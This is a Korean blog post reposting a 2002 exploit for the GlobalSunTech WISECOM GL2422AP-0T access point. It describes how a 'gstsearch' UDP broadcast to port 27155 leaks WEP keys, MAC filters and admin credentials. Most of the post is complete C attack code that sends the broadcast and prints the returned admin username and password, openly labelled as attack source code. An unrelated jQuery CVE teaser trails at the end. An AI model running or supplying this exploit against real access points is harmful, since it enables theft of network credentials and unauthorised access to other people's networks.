2013년 11월 26일 화요일

무선랜을 이용한 해킹 코드

공격용 소스코드 제목 :
Accesspoint 의 WEP key 와 비밀번호, MAC filter 노출

발표날짜 :
2002.11.01

해당 시스템 :
GlobalSunTech WISECOM GL2422AP-0T OEM 버전

문제점 :
GlobalSunTech 사는 Linksys, D-Link 와 같은 OEM 소비자들을 위한 엑세스 포인트를 개발하고 있는 회사이다.

여기서 WISECOM GL2422AP-0T 의 패킷이 캡쳐되는 취약점이 발견되었다.

UDP port 27155 로 보내어 지는 "gstsearch" 문자열을 포함하고 있는 브로드캐스트 패킷이 엑세스 포인트로 wep keys, mac filter, 관리자 비밀번호를 보낸다.

이러한 상황은 WLAN 과 LAN 쪽에서 발생한다.

공격법 / 공격용 소스코드 :
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;

int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);

sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");

val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}

ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}

ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));

printf("Type : %s\n",ans->type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);

return 0;
}

admin password

홈페이지 jQuery 라이브러리에서 CVE-2019-11358 취약점 패치 여부 확인 방법

현재 홈페이지에서 사용 중인 jQuery 라이브러리가 CVE-2019-11358 취약점 패치를 적용했는지 확인하는 방법은 다음과 같습니다. 1. jQuery 버전 확인 홈페이지 소스 코드를 확인하여 jQuery 라이브러리 버전을 직접 확인합니다. 웹 ...